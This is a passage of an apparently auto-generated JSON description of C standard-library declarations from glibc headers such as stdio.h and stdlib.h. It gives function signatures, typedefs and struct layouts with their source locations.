"ns": 0, "location": "/usr/include/stdio.h:545:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__c", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "putchar_unlocked", "ns": 0, "location": "/usr/include/stdio.h:546:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__c", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "getw", "ns": 0, "location": "/usr/include/stdio.h:553:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "putw", "ns": 0, "location": "/usr/include/stdio.h:556:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__w", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "fgets", "ns": 0, "location": "/usr/include/stdio.h:564:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__n", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "__getdelim", "ns": 0, "location": "/usr/include/stdio.h:603:18", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__lineptr", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "parameter", "name": "__n", "type": { "tag": ":pointer", "type": { "tag": "size_t" } } }, { "tag": "parameter", "name": "__delimiter", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": "__ssize_t" } }, { "tag": "function", "name": "getdelim", "ns": 0, "location": "/usr/include/stdio.h:606:18", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__lineptr", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "parameter", "name": "__n", "type": { "tag": ":pointer", "type": { "tag": "size_t" } } }, { "tag": "parameter", "name": "__delimiter", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": "__ssize_t" } }, { "tag": "function", "name": "getline", "ns": 0, "location": "/usr/include/stdio.h:616:18", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__lineptr", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "parameter", "name": "__n", "type": { "tag": ":pointer", "type": { "tag": "size_t" } } }, { "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": "__ssize_t" } }, { "tag": "function", "name": "fputs", "ns": 0, "location": "/usr/include/stdio.h:626:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "puts", "ns": 0, "location": "/usr/include/stdio.h:632:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "ungetc", "ns": 0, "location": "/usr/include/stdio.h:639:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__c", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "fread", "ns": 0, "location": "/usr/include/stdio.h:646:15", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__ptr", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__size", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "__n", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": "size_t" } }, { "tag": "function", "name": "fwrite", "ns": 0, "location": "/usr/include/stdio.h:652:15", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__ptr", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__size", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "__n", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": "size_t" } }, { "tag": "function", "name": "fread_unlocked", "ns": 0, "location": "/usr/include/stdio.h:673:15", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__ptr", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__size", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "__n", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": "size_t" } }, { "tag": "function", "name": "fwrite_unlocked", "ns": 0, "location": "/usr/include/stdio.h:675:15", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__ptr", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__size", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "__n", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": "size_t" } }, { "tag": "function", "name": "fseek", "ns": 0, "location": "/usr/include/stdio.h:684:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }, { "tag": "parameter", "name": "__off", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__whence", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "ftell", "ns": 0, "location": "/usr/include/stdio.h:689:17", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "rewind", "ns": 0, "location": "/usr/include/stdio.h:694:13", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "fseeko", "ns": 0, "location": "/usr/include/stdio.h:707:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }, { "tag": "parameter", "name": "__off", "type": { "tag": "__off_t" } }, { "tag": "parameter", "name": "__whence", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "ftello", "ns": 0, "location": "/usr/include/stdio.h:712:16", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": "__off_t" } }, { "tag": "function", "name": "fgetpos", "ns": 0, "location": "/usr/include/stdio.h:731:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }, { "tag": "parameter", "name": "__pos", "type": { "tag": ":pointer", "type": { "tag": "fpos_t" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "fsetpos", "ns": 0, "location": "/usr/include/stdio.h:736:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }, { "tag": "parameter", "name": "__pos", "type": { "tag": ":pointer", "type": { "tag": "fpos_t" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "clearerr", "ns": 0, "location": "/usr/include/stdio.h:757:13", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "feof", "ns": 0, "location": "/usr/include/stdio.h:759:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "ferror", "ns": 0, "location": "/usr/include/stdio.h:761:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "clearerr_unlocked", "ns": 0, "location": "/usr/include/stdio.h:765:13", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "feof_unlocked", "ns": 0, "location": "/usr/include/stdio.h:766:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "ferror_unlocked", "ns": 0, "location": "/usr/include/stdio.h:767:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "perror", "ns": 0, "location": "/usr/include/stdio.h:775:13", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":void" } }, { "tag": "extern", "name": "sys_nerr", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/sys_errlist.h:26:12", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "extern", "name": "sys_errlist", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/sys_errlist.h:27:26", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "function", "name": "fileno", "ns": 0, "location": "/usr/include/stdio.h:786:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "fileno_unlocked", "ns": 0, "location": "/usr/include/stdio.h:791:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "popen", "ns": 0, "location": "/usr/include/stdio.h:800:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__command", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__modes", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": "FILE" } } }, { "tag": "function", "name": "pclose", "ns": 0, "location": "/usr/include/stdio.h:806:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "ctermid", "ns": 0, "location": "/usr/include/stdio.h:812:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "flockfile", "ns": 0, "location": "/usr/include/stdio.h:840:13", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "ftrylockfile", "ns": 0, "location": "/usr/include/stdio.h:844:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "funlockfile", "ns": 0, "location": "/usr/include/stdio.h:847:13", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "__uflow", "ns": 0, "location": "/usr/include/stdio.h:858:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__overflow", "ns": 0, "location": "/usr/include/stdio.h:859:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "wchar_t", "location": "/usr/lib/clang/9.0.0/include/stddef.h:74:24", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "enum", "ns": 0, "name": "", "id": 11, "location": "/usr/include/x86_64-linux-gnu/bits/waitflags.h:52:9", "fields": [{ "tag": "field", "name": "P_ALL", "value": 0 }, { "tag": "field", "name": "P_PID", "value": 1 }, { "tag": "field", "name": "P_PGID", "value": 2 }] }, { "tag": "typedef", "ns": 0, "name": "idtype_t", "location": "/usr/include/x86_64-linux-gnu/bits/waitflags.h:57:3", "type": { "tag": ":enum", "name": "", "id": 11 } }, { "tag": "typedef", "ns": 0, "name": "_Float32", "location": "/usr/include/x86_64-linux-gnu/bits/floatn-common.h:214:15", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "_Float64", "location": "/usr/include/x86_64-linux-gnu/bits/floatn-common.h:251:16", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "_Float32x", "location": "/usr/include/x86_64-linux-gnu/bits/floatn-common.h:268:16", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "_Float64x", "location": "/usr/include/x86_64-linux-gnu/bits/floatn-common.h:285:21", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "typedef", "ns": 0, "name": "div_t", "location": "/usr/include/stdlib.h:62:5", "type": { "tag": "struct", "ns": 0, "name": "", "id": 12, "location": "/usr/include/stdlib.h:58:9", "bit-size": 64, "bit-alignment": 32, "fields": [{ "tag": "field", "name": "quot", "bit-offset": 0, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "rem", "bit-offset": 32, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }] } }, { "tag": "typedef", "ns": 0, "name": "ldiv_t", "location": "/usr/include/stdlib.h:70:5", "type": { "tag": "struct", "ns": 1915, "name": "", "id": 13, "location": "/usr/include/stdlib.h:66:9", "bit-size": 128, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "quot", "bit-offset": 0, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "rem", "bit-offset": 64, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }] } }, { "tag": "typedef", "ns": 0, "name": "lldiv_t", "location": "/usr/include/stdlib.h:80:5", "type": { "tag": "struct", "ns": 9311, "name": "", "id": 14, "location": "/usr/include/stdlib.h:76:23", "bit-size": 128, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "quot", "bit-offset": 0, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "rem", "bit-offset": 64, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }] } }, { "tag": "function", "name": "__ctype_get_mb_cur_max", "ns": 0, "location": "/usr/include/stdlib.h:97:15", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": "size_t" } }, { "tag": "function", "name": "atof", "ns": 0, "location": "/usr/include/stdlib.h:101:15", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__nptr", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "atoi", "ns": 0, "location": "/usr/include/stdlib.h:104:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__nptr", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "atol", "ns": 0, "location": "/usr/include/stdlib.h:107:17", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__nptr", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "atoll", "ns": 0, "location": "/usr/include/stdlib.h:112:36", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__nptr", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "strtod", "ns": 0, "location": "/usr/include/stdlib.h:117:15", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__nptr", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__endptr", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "strtof", "ns": 0, "location": "/usr/include/stdlib.h:123:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__nptr", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__endptr", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "strtold", "ns": 0, "location": "/usr/include/stdlib.h:126:20", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__nptr", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__endptr", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "strtol", "ns": 0, "location": "/usr/include/stdlib.h:176:17", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__nptr", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__endptr", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "parameter", "name": "__base", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "strtoul", "ns": 0, "location": "/usr/include/stdlib.h:180:26", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__nptr", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__endptr", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "parameter", "name": "__base", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "strtoq", "ns": 0, "location": "/usr/include/stdlib.h:187:22", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__nptr", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__endptr", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "parameter", "name": "__base", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "strtouq", "ns": 0, "location": "/usr/include/stdlib.h:192:31", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__nptr", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__endptr", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "parameter", "name": "__base", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "strtoll", "ns": 0, "location": "/usr/include/stdlib.h:200:22", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__nptr", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__endptr", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "parameter", "name": "__base", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "strtoull", "ns": 0, "location": "/usr/include/stdlib.h:205:31", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__nptr", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__endptr", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "parameter", "name": "__base", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "l64a", "ns": 0, "location": "/usr/include/stdlib.h:385:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__n", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "a64l", "ns": 0, "location": "/usr/include/stdlib.h:388:17", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "u_char", "location": "/usr/include/x86_64-linux-gnu/sys/types.h:33:18", "type": { "tag": "__u_char" } }, { "tag": "typedef", "ns": 0, "name": "u_short", "location": "/usr/include/x86_64-linux-gnu/sys/types.h:34:19", "type": { "tag": "__u_short" } }, { "tag": "typedef", "ns": 0, "name": "u_int", "location": "/usr/include/x86_64-linux-gnu/sys/types.h:35:17", "type": { "tag": "__u_int" } }, { "tag": "typedef", "ns": 0, "name": "u_long", "location": "/usr/include/x86_64-linux-gnu/sys/types.h:36:18", "type": { "tag": "__u_long" } }, { "tag": "typedef", "ns": 0, "name": "quad_t", "location": "/usr/include/x86_64-linux-gnu/sys/types.h:37:18", "type": { "tag": "__quad_t" } }, { "tag": "typedef", "ns": 0, "name": "u_quad_t", "location": "/usr/include/x86_64-linux-gnu/sys/types.h:38:20", "type": { "tag": "__u_quad_t" } }, { "tag": "typedef", "ns": 0, "name": "fsid_t", "location": "/usr/include/x86_64-linux-gnu/sys/types.h:39:18", "type": { "tag": "__fsid_t" } }, { "tag": "typedef", "ns": 0, "name": "loff_t", "location": "/usr/include/x86_64-linux-gnu/sys/types.h:42:18", "type": { "tag": "__loff_t" } }, { "tag": "typedef", "ns": 0, "name": "ino_t", "location": "/usr/include/x86_64-linux-gnu/sys/types.h:47:17", "type": { "tag": "__ino_t" } }, { "tag": "typedef", "ns": 0, "name": "dev_t", "location": "/usr/include/x86_64-linux-gnu/sys/types.h:59:17", "type": { "tag": "__dev_t" } }, { "tag": "typedef", "ns": 0, "name": "gid_t", "location": "/usr/include/x86_64-linux-gnu/sys/types.h:64:17", "type": { "tag": "__gid_t" } }, { "tag": "typedef", "ns": 0, "name": "mode_t", "location": "/usr/include/x86_64-linux-gnu/sys/types.h:69:18", "type": { "tag": "__mode_t" } }, { "tag": "typedef", "ns": 0, "name": "nlink_t", "location": "/usr/include/x86_64-linux-gnu/sys/types.h:74:19", "type": { "tag": "__nlink_t" } }, { "tag": "typedef", "ns": 0, "name": "uid_t", "location": "/usr/include/x86_64-linux-gnu/sys/types.h:79:17", "type": { "tag": "__uid_t" } }, { "tag": "typedef", "ns": 0, "name": "pid_t", "location": "/usr/include/x86_64-linux-gnu/sys/types.h:97:17", "type": { "tag": "__pid_t" } }, { "tag": "typedef", "ns": 0, "name": "id_t", "location": "/usr/include/x86_64-linux-gnu/sys/types.h:103:16", "type": { "tag": "__id_t" } }, { "tag": "typedef", "ns": 0, "name": "daddr_t", "location": "/usr/include/x86_64-linux-gnu/sys/types.h:114:19", "type": { "tag": "__daddr_t" } }, { "tag": "typedef", "ns": 0, "name": "caddr_t", "location": "/usr/include/x86_64-linux-gnu/sys/types.h:115:19", "type": { "tag": "__caddr_t" } }, { "tag": "typedef", "ns": 0, "name": "key_t", "location": "/usr/include/x86_64-linux-gnu/sys/types.h:121:17", "type": { "tag": "__key_t" } }, { "tag": "typedef", "ns": 0, "name": 